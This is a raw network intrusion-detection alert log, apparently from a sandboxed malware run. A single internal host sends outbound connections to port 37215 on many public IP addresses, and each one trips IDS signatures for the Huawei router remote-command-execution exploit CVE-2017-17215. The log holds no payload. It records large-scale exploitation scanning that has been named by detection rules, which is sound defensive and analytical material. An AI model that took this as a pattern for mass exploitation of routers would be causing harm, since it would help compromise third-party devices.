                                                    07/10/24-08:26:47.896576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6050037215192.168.2.1441.169.155.189
                                                    07/10/24-08:26:42.161476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4951437215192.168.2.14197.203.176.222
                                                    07/10/24-08:27:17.087828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5608437215192.168.2.1441.124.18.162
                                                    07/10/24-08:26:29.858032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4916637215192.168.2.14201.173.144.185
                                                    07/10/24-08:27:17.060306TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4286637215192.168.2.1441.13.21.93
                                                    07/10/24-08:26:48.021519TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3421037215192.168.2.14157.97.160.105
                                                    07/10/24-08:27:33.961226TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5704437215192.168.2.14157.185.107.60
                                                    07/10/24-08:27:17.079394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5040837215192.168.2.14157.14.15.117
                                                    07/10/24-08:26:41.325591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4822637215192.168.2.14149.33.74.106
                                                    07/10/24-08:26:55.456990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3529637215192.168.2.1441.149.156.152
                                                    07/10/24-08:27:13.998046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4379237215192.168.2.1441.181.125.124
                                                    07/10/24-08:26:48.008674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5257237215192.168.2.1441.11.23.109
                                                    07/10/24-08:26:36.357505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3622237215192.168.2.14197.42.134.206
                                                    07/10/24-08:26:49.829856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5169037215192.168.2.1439.67.158.255
                                                    07/10/24-08:27:19.340130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4850037215192.168.2.14180.27.67.140
                                                    07/10/24-08:26:14.823553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5886637215192.168.2.1418.75.159.116
                                                    07/10/24-08:27:20.516215TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3966637215192.168.2.14197.165.233.194
                                                    07/10/24-08:26:49.811589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3414637215192.168.2.14113.2.174.161
                                                    07/10/24-08:26:55.360027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3625237215192.168.2.14157.197.49.47
                                                    07/10/24-08:27:22.835988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6068637215192.168.2.1449.213.230.128
                                                    07/10/24-08:26:25.509517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5098237215192.168.2.14157.54.37.88
                                                    07/10/24-08:27:13.865761TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5790637215192.168.2.1498.247.134.25
                                                    07/10/24-08:26:59.856754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3306637215192.168.2.14133.239.196.149
                                                    07/10/24-08:27:13.816832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3392037215192.168.2.1441.243.113.142
                                                    07/10/24-08:26:43.829086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4659237215192.168.2.14197.160.131.93
                                                    07/10/24-08:27:27.138440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5023037215192.168.2.1441.155.216.139
                                                    07/10/24-08:26:14.809992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4762037215192.168.2.14171.118.169.59
                                                    07/10/24-08:26:28.841879TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3530837215192.168.2.14132.104.62.98
                                                    07/10/24-08:27:24.957397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5345037215192.168.2.14197.171.209.1
                                                    07/10/24-08:27:20.428131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5641437215192.168.2.14213.90.159.159
                                                    07/10/24-08:26:25.488012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3609037215192.168.2.14157.159.138.142
                                                    07/10/24-08:26:43.540694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4222837215192.168.2.14157.37.210.93
                                                    07/10/24-08:26:57.522324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4897637215192.168.2.14197.164.138.160
                                                    07/10/24-08:26:59.875965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5161237215192.168.2.1441.218.238.130
                                                    07/10/24-08:27:19.181230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4519637215192.168.2.1441.172.52.127
                                                    07/10/24-08:26:26.585190TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3305237215192.168.2.14174.216.252.36
                                                    07/10/24-08:26:43.722420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5917637215192.168.2.14157.58.72.75
                                                    07/10/24-08:26:45.660346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4842637215192.168.2.1441.238.29.52
                                                    07/10/24-08:26:11.596894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5877237215192.168.2.14157.151.135.126
                                                    07/10/24-08:26:17.984477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5611437215192.168.2.14136.42.197.63
                                                    07/10/24-08:27:13.828157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5957637215192.168.2.14123.137.83.112
                                                    07/10/24-08:27:02.976609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4667437215192.168.2.1441.61.190.200
                                                    07/10/24-08:26:17.986664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3627837215192.168.2.14197.71.194.17
                                                    07/10/24-08:26:23.328936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5748637215192.168.2.1424.242.194.24
                                                    07/10/24-08:26:38.512743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3491837215192.168.2.1487.45.41.47
                                                    07/10/24-08:27:11.503966TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4629837215192.168.2.14157.175.130.215
                                                    07/10/24-08:27:30.483664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4890237215192.168.2.1441.187.181.85
                                                    07/10/24-08:27:30.492988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4879237215192.168.2.1441.203.216.137
                                                    07/10/24-08:27:28.155678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5625637215192.168.2.14157.77.183.206
                                                    07/10/24-08:27:27.142531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3565837215192.168.2.14157.195.96.225
                                                    07/10/24-08:27:31.545900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4020237215192.168.2.1441.205.239.85
                                                    07/10/24-08:27:28.042131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5108037215192.168.2.14157.123.86.9
                                                    07/10/24-08:26:36.367348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5403237215192.168.2.14131.124.111.132
                                                    07/10/24-08:27:22.464589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5952637215192.168.2.14205.120.252.41
                                                    07/10/24-08:26:29.847797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5854437215192.168.2.14157.246.140.58
                                                    07/10/24-08:26:28.840131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3413437215192.168.2.1441.166.116.182
                                                    07/10/24-08:27:20.495859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5989437215192.168.2.1441.211.140.134
                                                    07/10/24-08:26:38.601191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5592237215192.168.2.1476.44.224.8
                                                    07/10/24-08:26:49.854683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4608437215192.168.2.14143.64.81.195
                                                    07/10/24-08:27:05.138827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4938837215192.168.2.1441.194.205.110
                                                    07/10/24-08:26:18.022260TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3633237215192.168.2.1491.22.145.102
                                                    07/10/24-08:26:25.515486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5540237215192.168.2.14172.141.197.65
                                                    07/10/24-08:27:31.479200TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4150037215192.168.2.1441.214.60.66
                                                    07/10/24-08:27:30.506751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4064237215192.168.2.1419.82.193.188
                                                    07/10/24-08:26:11.622181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5857837215192.168.2.1441.135.215.139
                                                    07/10/24-08:27:11.477430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3644037215192.168.2.14157.42.59.110
                                                    07/10/24-08:26:53.186613TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5619237215192.168.2.14157.26.88.21
                                                    07/10/24-08:27:03.030888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4585637215192.168.2.14197.31.133.166
                                                    07/10/24-08:26:25.481265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4088637215192.168.2.14157.240.100.113
                                                    07/10/24-08:26:25.446439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3620437215192.168.2.14197.13.156.215
                                                    07/10/24-08:26:43.538160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3423837215192.168.2.14197.172.157.10
                                                    07/10/24-08:26:45.666546TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3679437215192.168.2.1451.88.156.72
                                                    07/10/24-08:26:57.576804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5700037215192.168.2.14197.66.186.248
                                                    07/10/24-08:27:02.694487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5984837215192.168.2.1441.237.139.15
                                                    07/10/24-08:26:11.094996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3865237215192.168.2.14197.134.93.225
                                                    07/10/24-08:26:45.619051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4038037215192.168.2.14157.127.139.35
                                                    07/10/24-08:26:41.529158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5351837215192.168.2.14197.58.175.27
                                                    07/10/24-08:26:15.809769TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3935837215192.168.2.14197.164.112.117
                                                    07/10/24-08:26:47.920838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5764437215192.168.2.14197.182.33.45
                                                    07/10/24-08:27:33.970105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5078637215192.168.2.14158.65.189.167
                                                    07/10/24-08:26:29.880406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5783437215192.168.2.14157.214.214.228
                                                    07/10/24-08:26:43.842047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4507037215192.168.2.14157.152.145.55
                                                    07/10/24-08:27:19.309217TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3880837215192.168.2.14197.229.151.55
                                                    07/10/24-08:27:32.583920TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5971437215192.168.2.1441.99.213.124
                                                    07/10/24-08:26:31.063157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4836037215192.168.2.14157.133.101.228
                                                    07/10/24-08:26:43.785438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4280637215192.168.2.14196.206.205.115
                                                    07/10/24-08:26:49.831923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5422037215192.168.2.1441.1.106.1
                                                    07/10/24-08:26:28.808876TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5319637215192.168.2.14157.74.54.242
                                                    07/10/24-08:27:10.751291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6021637215192.168.2.1453.194.47.239
                                                    07/10/24-08:26:59.541812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4465837215192.168.2.14197.3.255.125
                                                    07/10/24-08:26:13.767768TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4364437215192.168.2.14197.215.171.127
                                                    07/10/24-08:27:22.455545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5766637215192.168.2.14155.210.73.129
                                                    07/10/24-08:27:27.047085TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3343837215192.168.2.14157.149.216.193
                                                    07/10/24-08:27:08.435452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5098837215192.168.2.1441.8.109.90
                                                    07/10/24-08:27:13.752380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4860637215192.168.2.14180.77.147.166
                                                    07/10/24-08:26:41.486233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3903837215192.168.2.1441.162.90.166
                                                    07/10/24-08:27:33.730213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5645837215192.168.2.1484.165.32.28
                                                    07/10/24-08:27:02.898852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6049437215192.168.2.1441.111.138.62
                                                    07/10/24-08:26:28.873311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5068637215192.168.2.14157.18.242.31
                                                    07/10/24-08:27:14.821863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5357637215192.168.2.14157.123.67.184
                                                    07/10/24-08:26:42.432060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3500837215192.168.2.14157.79.79.179
                                                    07/10/24-08:26:14.771474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5174637215192.168.2.14189.152.127.207
                                                    07/10/24-08:26:59.717108TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5694037215192.168.2.14157.94.161.138
                                                    07/10/24-08:26:14.823553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5362437215192.168.2.1438.161.32.31
                                                    07/10/24-08:26:29.800404TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5050637215192.168.2.14157.86.147.125
                                                    07/10/24-08:26:53.247062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5779237215192.168.2.1441.178.230.15
                                                    07/10/24-08:26:59.637252TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4552837215192.168.2.14197.172.99.200
                                                    07/10/24-08:26:53.247810TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5396837215192.168.2.14140.81.254.59
                                                    07/10/24-08:26:47.832991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3899437215192.168.2.1441.50.62.94
                                                    07/10/24-08:26:47.988456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6041037215192.168.2.14157.93.100.208
                                                    07/10/24-08:26:18.019424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5648437215192.168.2.14197.177.74.156
                                                    07/10/24-08:26:28.763825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3414037215192.168.2.14113.77.143.158
                                                    07/10/24-08:26:41.462014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4728837215192.168.2.14157.56.10.99
                                                    07/10/24-08:27:33.751241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3382637215192.168.2.1441.201.0.232
                                                    07/10/24-08:26:11.588620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3469837215192.168.2.1490.185.86.151
                                                    07/10/24-08:26:14.623389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5316837215192.168.2.14100.133.62.95
                                                    07/10/24-08:26:33.166033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4257037215192.168.2.14157.187.221.205
                                                    07/10/24-08:27:33.753390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4602837215192.168.2.14136.121.47.149
                                                    07/10/24-08:26:49.832031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4933237215192.168.2.14197.230.57.2
                                                    07/10/24-08:26:17.933163TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4358437215192.168.2.14157.234.94.222
                                                    07/10/24-08:26:13.782831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4806437215192.168.2.1441.100.42.16
                                                    07/10/24-08:26:17.956514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3975637215192.168.2.14197.95.143.3
                                                    07/10/24-08:26:47.841938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3451837215192.168.2.14211.111.87.43
                                                    07/10/24-08:26:31.091003TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3686237215192.168.2.14197.104.173.213
                                                    07/10/24-08:27:08.431901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5820637215192.168.2.1486.243.120.23
                                                    07/10/24-08:27:31.530342TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4978637215192.168.2.14197.253.89.28
                                                    07/10/24-08:26:33.196889TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3372037215192.168.2.14157.88.26.255
                                                    07/10/24-08:26:25.524455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3821837215192.168.2.14197.114.117.160
                                                    07/10/24-08:26:45.609280TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3921837215192.168.2.14157.72.155.125
                                                    07/10/24-08:27:13.828158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4018037215192.168.2.14157.122.9.199
                                                    07/10/24-08:26:57.651213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5367837215192.168.2.14197.56.116.79
                                                    07/10/24-08:26:59.757795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5244837215192.168.2.1441.158.123.253
                                                    07/10/24-08:27:07.358183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3650837215192.168.2.14157.26.207.64
                                                    07/10/24-08:27:07.368181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5786037215192.168.2.14208.162.13.4
                                                    07/10/24-08:27:08.318439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4948237215192.168.2.14197.10.81.123
                                                    07/10/24-08:26:57.684476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5130437215192.168.2.14157.183.211.170
                                                    07/10/24-08:26:43.913134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6005637215192.168.2.14157.149.38.83
                                                    07/10/24-08:27:14.853169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4662837215192.168.2.14197.215.10.206
                                                    07/10/24-08:27:27.051851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3402437215192.168.2.1441.157.51.102
                                                    07/10/24-08:26:47.909293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4461437215192.168.2.1441.80.151.67
                                                    07/10/24-08:27:14.665617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5800837215192.168.2.14113.15.117.221
                                                    07/10/24-08:26:41.419357TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4971637215192.168.2.14197.167.44.70
                                                    07/10/24-08:26:25.488063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3617037215192.168.2.14157.188.193.181
                                                    07/10/24-08:27:05.154220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3702837215192.168.2.14125.48.229.203
                                                    07/10/24-08:26:53.134906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4327837215192.168.2.1459.96.117.134
                                                    07/10/24-08:26:23.279248TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4600237215192.168.2.14105.228.234.84
                                                    07/10/24-08:26:13.847227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5842837215192.168.2.1441.55.234.176
                                                    07/10/24-08:26:38.559364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5541837215192.168.2.14157.167.179.1
                                                    07/10/24-08:26:41.360429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4235837215192.168.2.14197.27.94.145
                                                    07/10/24-08:27:11.522078TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5797837215192.168.2.14197.94.223.92
                                                    07/10/24-08:27:33.803873TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6013637215192.168.2.14103.236.71.221
                                                    07/10/24-08:26:23.343986TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4188237215192.168.2.1441.181.45.214
                                                    07/10/24-08:26:47.998541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4190637215192.168.2.14197.193.13.110
                                                    07/10/24-08:26:47.827027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4576437215192.168.2.14157.72.12.64
                                                    07/10/24-08:27:05.143503TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3761637215192.168.2.1441.101.81.172
                                                    07/10/24-08:26:15.869114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4627837215192.168.2.1441.254.106.223
                                                    07/10/24-08:26:59.640486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4334437215192.168.2.1451.196.133.221
                                                    07/10/24-08:26:23.268554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3531637215192.168.2.1484.204.146.30
                                                    07/10/24-08:26:28.791726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3543637215192.168.2.14157.228.140.165
                                                    07/10/24-08:26:13.818987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4563237215192.168.2.14197.143.8.81
                                                    07/10/24-08:27:13.714524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5929037215192.168.2.14179.219.194.60
                                                    07/10/24-08:27:19.343143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3863037215192.168.2.1452.170.226.199
                                                    07/10/24-08:26:11.493465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4956437215192.168.2.14197.174.164.182
                                                    07/10/24-08:27:13.973446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4404637215192.168.2.1441.148.60.129
                                                    07/10/24-08:27:13.988913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4884037215192.168.2.14147.239.135.231
                                                    07/10/24-08:27:19.267667TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5117437215192.168.2.14197.159.83.151
                                                    07/10/24-08:27:02.872706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5788437215192.168.2.14194.187.148.97
                                                    07/10/24-08:27:02.898056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3739837215192.168.2.1441.205.182.248
                                                    07/10/24-08:27:28.169608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5140037215192.168.2.14200.249.207.46
                                                    07/10/24-08:27:07.390012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4575437215192.168.2.14157.210.232.105
                                                    07/10/24-08:26:34.234468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3362237215192.168.2.1441.182.148.86
                                                    07/10/24-08:27:20.476215TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5934237215192.168.2.1441.216.225.143
                                                    07/10/24-08:26:43.752135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5579437215192.168.2.14163.155.146.95
                                                    07/10/24-08:26:38.542118TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4213637215192.168.2.1441.16.134.250
                                                    07/10/24-08:27:07.259600TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5658637215192.168.2.1470.238.218.185
                                                    07/10/24-08:26:33.257964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3380437215192.168.2.14197.13.33.252
                                                    07/10/24-08:27:08.403576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5147437215192.168.2.14197.2.61.117
                                                    07/10/24-08:27:28.166168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5742037215192.168.2.14157.211.17.147
                                                    07/10/24-08:26:47.981367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4652837215192.168.2.14157.230.40.98
                                                    07/10/24-08:27:30.423823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6087837215192.168.2.14197.228.167.117
                                                    07/10/24-08:27:24.962148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5452037215192.168.2.1453.230.255.248
                                                    07/10/24-08:26:57.627051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5868437215192.168.2.1441.19.228.72
                                                    07/10/24-08:27:32.622738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4564037215192.168.2.14157.89.44.192
                                                    07/10/24-08:26:17.971584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3548437215192.168.2.14157.232.5.252
                                                    07/10/24-08:27:05.081502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4163437215192.168.2.14139.138.160.68
                                                    07/10/24-08:26:25.479455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5929637215192.168.2.14119.26.197.79
